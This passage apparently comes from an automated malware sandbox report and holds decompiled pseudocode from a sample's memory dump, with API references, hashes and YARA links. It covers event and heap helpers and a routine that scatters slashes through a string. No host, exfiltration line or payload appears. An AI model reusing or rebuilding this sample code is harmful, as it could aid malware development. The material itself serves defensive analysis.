					_t25 = CreateEventA(0x2a7d2ac, 1, 0, _t30);
					E02A7A734(_t30);
				}
				_t12 =  *0x2a7d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02A7A65C() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02A78EA1(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2a7d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02A7A273(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x02a711ef
0x02a711f6
0x02a71200
0x02a71204
0x02a7120a
0x02a71219
0x02a71220
0x02a71224
0x02a71236
0x02a71238
0x02a71238
0x02a7123d
0x02a71244
0x02a7129b
0x02a7129b
0x02a712a1
0x02a712a3
0x02a712a3
0x02a712ad
0x02a712b1
0x02a712c3
0x02a712c3
0x02a712c7
0x02a712cd
0x02a712cd
0x00000000
0x02a7125d
0x02a71262
0x02a7126a
0x02a7126e
0x02a71272
0x02a71272
0x02a7127f
0x02a71283
0x02a71287
0x02a712dc
0x02a712e2
0x02a712e2
0x02a71295
0x02a71299
0x02a712d0
0x02a712d2
0x02a712d5
0x02a712d5
0x00000000
0x02a712d2
0x02a71299
0x00000000
0x02a71283

APIs

Part of subcall function 02A738A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,04D19A70,00000000,?,?,63699BC3,00000005,02A7D00C,?,?,02A75D30), ref: 02A738DE
Part of subcall function 02A738A8: lstrcpy.KERNEL32(00000000,00000000), ref: 02A73902
Part of subcall function 02A738A8: lstrcat.KERNEL32(00000000,00000000), ref: 02A7390A

CreateEventA.KERNEL32(02A7D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02A73760,?,00000001,?), ref: 02A7122F

Part of subcall function 02A7A734: HeapFree.KERNEL32(00000000,00000000,02A75637,00000000,?,?,00000000), ref: 02A7A740

WaitForSingleObject.KERNEL32(00000000,00004E20,02A73760,00000000,00000000,?,00000000,?,02A73760,?,00000001,?,?,?,?,02A752AA), ref: 02A7128F
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02A73760,?,00000001,?), ref: 02A712BD
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02A73760,?,00000001,?,?,?,?,02A752AA), ref: 02A712D5

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 2f1266166c820f9e163f51b6df6a1044f739627d181b6f9752d7c9feef8dfbd6
Instruction ID: f4463913e1f32a943ac11ea0fb828a2ed4b70c40e02cd796f7ea628f67d3f1d9
Opcode Fuzzy Hash: 2f1266166c820f9e163f51b6df6a1044f739627d181b6f9752d7c9feef8dfbd6
Instruction Fuzzy Hash: 1B21D232A807106BC7215B688C84B6BF3EABFA9725B150A35FD49E7110DF70C9068EDC

Uniqueness

Uniqueness Score: -1.00%

Function 02A79242, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02A79242(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x2a7d13c; // 0x2a7abf1
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02A7A71F(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E02A7A734(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02A75646( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x02a79242
0x02a79242
0x02a7924c
0x02a79252
0x02a79255
0x02a79259
0x02a7925f
0x02a79264
0x02a7927d
0x02a79280
0x02a79284
0x02a79288
0x02a79289
0x02a7928e
0x02a79291
0x02a79298
0x02a7929f
0x02a792f2
0x02a792f8
0x02a792fe
0x02a79339
0x02a7933f
0x00000000
0x00000000
0x00000000
0x02a792fe
0x02a792a5
0x00000000
0x02a792ac
0x02a792ba
0x02a792bd
0x02a792c0
0x02a792cc
0x02a792d0
0x02a79332
0x02a792d2
0x02a792d5
0x02a792d9
0x02a792da
0x02a792db
0x02a792dd
0x02a792e4
0x02a79322
0x02a7932d
0x02a792e6
0x02a792e9
0x02a792ed
0x02a792ed
0x02a792e4
0x00000000
0x02a792d0
0x02a792a5
0x02a79269
0x02a7926f
0x02a79272
0x02a79277
0x00000000
0x00000000
0x00000000
0x02a79307
0x02a7930f
0x02a79314
0x02a79317
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 02A79259
SetEvent.KERNEL32(?), ref: 02A79269
GetLastError.KERNEL32 ref: 02A792F2

Part of subcall function 02A75646: WaitForMultipleObjects.KERNEL32(00000002,02A7A8E3,00000000,02A7A8E3,?,?,?,02A7A8E3,0000EA60), ref: 02A75661

Part of subcall function 02A7A734: HeapFree.KERNEL32(00000000,00000000,02A75637,00000000,?,?,00000000), ref: 02A7A740

GetLastError.KERNEL32(00000000), ref: 02A79327

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: f45afe017275a8dd4b9b05db3357436dbfa2f3ea30479536098a04d8828a2c14
Instruction ID: 978f5ee28ba12bb0432740ec0ebc8026fe11874b9fd1a59e619bd52f45c1b9cb
Opcode Fuzzy Hash: f45afe017275a8dd4b9b05db3357436dbfa2f3ea30479536098a04d8828a2c14
Instruction Fuzzy Hash: 0031EAB5D40209EFDB20DFA5DCC49AFB7BDAB08314F1049AAE542E3241DB30AA499F54

Uniqueness

Uniqueness Score: -1.00%

Function 02A736B1, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E02A736B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02A73BB9(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E02A74F79(_t23);
						}
					}
					return _t38;
				}
				if(E02A7A2F9(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2a7d2ac, 1, 0,  *0x2a7d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02A7A446(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02A7853F(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02A74F14(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02A711EE( &_v32, _t39);
					goto L13;
				}
			}

0x02a736b1
0x02a736be
0x02a736c4
0x02a736c5
0x02a736c6
0x02a736c7
0x02a736c8
0x02a736cc
0x02a736d8
0x02a736dc
0x02a73764
0x02a73764
0x02a73767
0x02a73769
0x02a73771
0x02a73771
0x02a73777
0x02a7377a
0x02a7377a
0x02a73777
0x02a73785
0x02a73785
0x02a736ef
0x02a736f1
0x02a736f1
0x02a73708
0x02a7370c
0x02a7370f
0x02a7371a
0x02a73721
0x02a73721
0x02a7372a
0x02a7372e
0x02a7373c
0x02a73730
0x02a73730
0x02a73731
0x02a73732
0x02a73733
0x02a73734
0x02a73735
0x02a73735
0x02a73741
0x02a73744
0x02a73748
0x02a7374a
0x02a7374a
0x02a73751
0x00000000
0x02a73753
0x02a73753
0x02a73760
0x00000000
0x02a73760

APIs

CreateEventA.KERNEL32(02A7D2AC,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,02A752AA,?,00000001,?), ref: 02A73702
SetEvent.KERNEL32(00000000,?,?,?,02A752AA,?,00000001,?,00000002,?,?,02A75D5E,?), ref: 02A7370F
Sleep.KERNEL32(00000BB8,?,?,?,02A752AA,?,00000001,?,00000002,?,?,02A75D5E,?), ref: 02A7371A
CloseHandle.KERNEL32(00000000,?,?,?,02A752AA,?,00000001,?,00000002,?,?,02A75D5E,?), ref: 02A73721

Part of subcall function 02A7A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,02A73741,?,02A73741,?,?,?,?,?,02A73741,?), ref: 02A7A520

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 4d8ea74bc2ebe71734eded7e7b3ff63efdd44fbb3d78982155a5d94fd113c9a6
Instruction ID: 6348f1eb245e5c65124ae86cf12af6189bccdf6deb154118dec7bd2809fe1fe7
Opcode Fuzzy Hash: 4d8ea74bc2ebe71734eded7e7b3ff63efdd44fbb3d78982155a5d94fd113c9a6
Instruction Fuzzy Hash: 4B21AAB2D40215EBCF10FFE58DC48AEB77AAF44754B024465EA11E7100DF34D945DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 02A717E5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02A717E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2a7d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2a7d250; // 0xcd072abf
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2a7d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x02a717ed
0x02a717f0
0x02a717f6
0x02a7180e
0x02a71810
0x02a71815
0x02a71817
0x02a7181a
0x02a7181c
0x02a7181f
0x02a71821
0x02a71821
0x02a71823
0x02a7182e
0x02a71833
0x02a71844
0x02a7184c
0x02a71851
0x02a71854
0x02a71857
0x02a71859
0x02a7185c
0x02a7185f
0x02a7185f
0x02a71862
0x02a7186d
0x02a71872
0x02a7187c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02A71C49,00000000,?,?,02A720C2,?,04D195B0), ref: 02A717F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 02A71808
memcpy.NTDLL(00000000,?,-00000008,?,?,?,02A71C49,00000000,?,?,02A720C2,?,04D195B0), ref: 02A7184C
memcpy.NTDLL(00000001,?,00000001), ref: 02A7186D

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 7eb897e964c1932e2957e88b7aab22ea103ab6dc6cb9701cc7c0868ebcd19e11
Instruction ID: 7675504cce282d99c0728d3bfeeeea6abdd4e5152a5c3081f5c2afb9ae02e50e
Opcode Fuzzy Hash: 7eb897e964c1932e2957e88b7aab22ea103ab6dc6cb9701cc7c0868ebcd19e11
Instruction Fuzzy Hash: 5711E372E40214ABD3108BA9DC84E9EBBEEDB90760B0502B6F50597140EF70DA1A87E8

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF6CFE, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6DDF6D22

Part of subcall function 6DDF7409: __fltout2.LIBCMT ref: 6DDF7432

__cftog_l.LIBCMT ref: 6DDF6D48
__cftoe_l.LIBCMT ref: 6DDF6D7A

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 12c5a2e8d1f8bed58598dcca5687e2d7545c6bbf63180a4d191739d339ce85d6
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 19014B3244424EFBCF126F94DC11CEE3F36BB19254B4A8415FA2859431D337CAB2AB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DDED309, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6DDED320

Part of subcall function 6DDED948: ___BuildCatchObjectHelper.LIBCMT ref: 6DDED97A
Part of subcall function 6DDED948: ___AdjustPointer.LIBCMT ref: 6DDED991

_UnwindNestedFrames.LIBCMT ref: 6DDED337
___FrameUnwindToState.LIBCMT ref: 6DDED349
CallCatchBlock.LIBCMT ref: 6DDED36D

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: 77e9ce4982eeffa73c95e3f9bac00cf9d2fbf83d4ade13bb3658eac0e05ddc5c
Instruction ID: 2e22bb7a135d4fedd460411e4d655c1b66999dc55bcc01aebb1ff677473d7cbb
Opcode Fuzzy Hash: 77e9ce4982eeffa73c95e3f9bac00cf9d2fbf83d4ade13bb3658eac0e05ddc5c
Instruction Fuzzy Hash: 4F01D732404109BBCF126F55CD00EEA7BBAEFC9798F154115FE5866121D736E461DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A76840, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A76840(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x02a7684a
0x02a7684e
0x02a76863
0x02a76865
0x02a7686a
0x02a76870
0x02a76872
0x02a76877
0x02a76882
0x02a76879
0x02a76879
0x02a76879
0x02a76877
0x02a76890

APIs

memset.NTDLL ref: 02A7684E
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 02A76863
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02A76870
CloseHandle.KERNEL32(?), ref: 02A76882

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 1c170f751fa4115a0144054b68fb497c73734949709602112188807e7560c369
Instruction ID: 831245fb4cd46db4b495a3c733e1def83f28dd15991836cb16f4400859867eea
Opcode Fuzzy Hash: 1c170f751fa4115a0144054b68fb497c73734949709602112188807e7560c369
Instruction Fuzzy Hash: 82F054F15447087FD3106F66DCC4D27BBADEB51299B154A2EF14281111CA71E8198F64

Uniqueness

Uniqueness Score: -1.00%

Function 02A723F4, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E02A723F4(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x2a7d32c; // 0x4d195b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2a7d32c; // 0x4d195b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x2a7d030) {
					HeapFree( *0x2a7d238, 0, _t8);
				}
				_t14[1] = E02A7486F(_v0, _t14);
				_t11 =  *0x2a7d32c; // 0x4d195b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x02a723f4
0x02a723f4
0x02a723fd
0x02a7240d
0x02a7240d
0x02a72412
0x02a72417
0x00000000
0x00000000
0x02a72407
0x02a72407
0x02a72419
0x02a7241d
0x02a7242f
0x02a7242f
0x02a7243f
0x02a72442
0x02a72447
0x02a7244b
0x02a72451

APIs

RtlEnterCriticalSection.NTDLL(04D19570), ref: 02A723FD
Sleep.KERNEL32(0000000A,?,02A75D25), ref: 02A72407
HeapFree.KERNEL32(00000000,00000000,?,02A75D25), ref: 02A7242F
RtlLeaveCriticalSection.NTDLL(04D19570), ref: 02A7244B

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: d82ceb7605b007431f80873cc76f07307bb229e5c2812e0bd2a2d0472aebed09
Instruction ID: 25b360cd0f3ea24bb85316be58d23409b3b865288e0cead56be1b4ef8d0cb394
Opcode Fuzzy Hash: d82ceb7605b007431f80873cc76f07307bb229e5c2812e0bd2a2d0472aebed09
Instruction Fuzzy Hash: 33F05270A806409BE7209F68ED88F0A7BE9AF18740B008855F906D7251CF30E86BCB6D

Uniqueness

Uniqueness Score: -1.00%

Function 02A71B42, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A71B42() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2a7d26c; // 0x2cc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2a7d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2a7d26c; // 0x2cc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2a7d238; // 0x4920000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x02a71b42
0x02a71b49
0x02a71b93
0x02a71b95
0x02a71b95
0x02a71b4d
0x02a71b53
0x02a71b58
0x02a71b5c
0x02a71b62
0x02a71b69
0x00000000
0x00000000
0x02a71b6b
0x02a71b70
0x00000000
0x00000000
0x00000000
0x02a71b70
0x02a71b72
0x02a71b7a
0x02a71b7d
0x02a71b7d
0x02a71b83
0x02a71b8a
0x02a71b8d
0x02a71b8d
0x00000000

APIs

SetEvent.KERNEL32(000002CC,00000001,02A74F0E), ref: 02A71B4D
SleepEx.KERNEL32(00000064,00000001), ref: 02A71B5C
CloseHandle.KERNEL32(000002CC), ref: 02A71B7D
HeapDestroy.KERNEL32(04920000), ref: 02A71B8D

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 73b598fba9da3c92643048ea6d204c6fec0fa8cd9e17822c4aa297cda06e75dd
Instruction ID: fe04141aebfc97aac4e63476eea2171392b0b18e1fef5da41ef0a72ed7373c5f
Opcode Fuzzy Hash: 73b598fba9da3c92643048ea6d204c6fec0fa8cd9e17822c4aa297cda06e75dd
Instruction Fuzzy Hash: 3CF03071F8171197DB105B39EC88E167BD9AF547717040A21B908E7690EF30C55F96EC

Uniqueness

Uniqueness Score: -1.00%

Function 02A76702, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E02A76702() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2a7d32c; // 0x4d195b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2a7d32c; // 0x4d195b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2a7d32c; // 0x4d195b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2a7e81a) {
					HeapFree( *0x2a7d238, 0, _t10);
					_t7 =  *0x2a7d32c; // 0x4d195b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x02a76702
0x02a7670b
0x02a7671b
0x02a7671b
0x02a76720
0x02a76725
0x00000000
0x00000000
0x02a76715
0x02a76715
0x02a76727
0x02a7672c
0x02a76730
0x02a76743
0x02a76749
0x02a76749
0x02a76752
0x02a76754
0x02a76758
0x02a7675e

APIs

RtlEnterCriticalSection.NTDLL(04D19570), ref: 02A7670B
Sleep.KERNEL32(0000000A,?,02A75D25), ref: 02A76715
HeapFree.KERNEL32(00000000,?,?,02A75D25), ref: 02A76743
RtlLeaveCriticalSection.NTDLL(04D19570), ref: 02A76758

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 6729d6ed113aaa75f045f62164e3592ddf9234ff96c82cc741a276518be76565
Instruction ID: 6e8f12bbcdb5db403208c4597d444c10f8228353d28880ed259dd96ce119ee99
Opcode Fuzzy Hash: 6729d6ed113aaa75f045f62164e3592ddf9234ff96c82cc741a276518be76565
Instruction Fuzzy Hash: ABF0D474E80900DFE7188F64DD99F1577EAAF48B50B04884AE906CB260DF30E82ACA5C

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE78D0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 6DDE7B4C

Strings

$, xrefs: 6DDE7967
$, xrefs: 6DDE7970

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: swprintf
String ID: $$$
API String ID: 233258989-233714265
Opcode ID: 4c13b2eb5b8c62805ec641d57826f0e85cc100c864bad3dee766ca7627b13046
Instruction ID: 2f60f649d2cb4fdf552321134351c267f520a8484e93d003b6f8746f4c7944d3
Opcode Fuzzy Hash: 4c13b2eb5b8c62805ec641d57826f0e85cc100c864bad3dee766ca7627b13046
Instruction Fuzzy Hash: D3817C71E0461DEEDB61DF68C850B9EB7B5BF46380F00C199E95DA7242EB348A81CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE7BB0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 6DDE7E10

Strings

$, xrefs: 6DDE7C50
$, xrefs: 6DDE7C47

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: swprintf
String ID: $$$
API String ID: 233258989-233714265
Opcode ID: 30550065f43e52211d47f6e53d90939366c55dddf1a3b4d3be5204d3cc948867
Instruction ID: 1b9c9275b44915c22fc76dceda96f7e17795dfd49c051302e77555f0f45f2fd6
Opcode Fuzzy Hash: 30550065f43e52211d47f6e53d90939366c55dddf1a3b4d3be5204d3cc948867
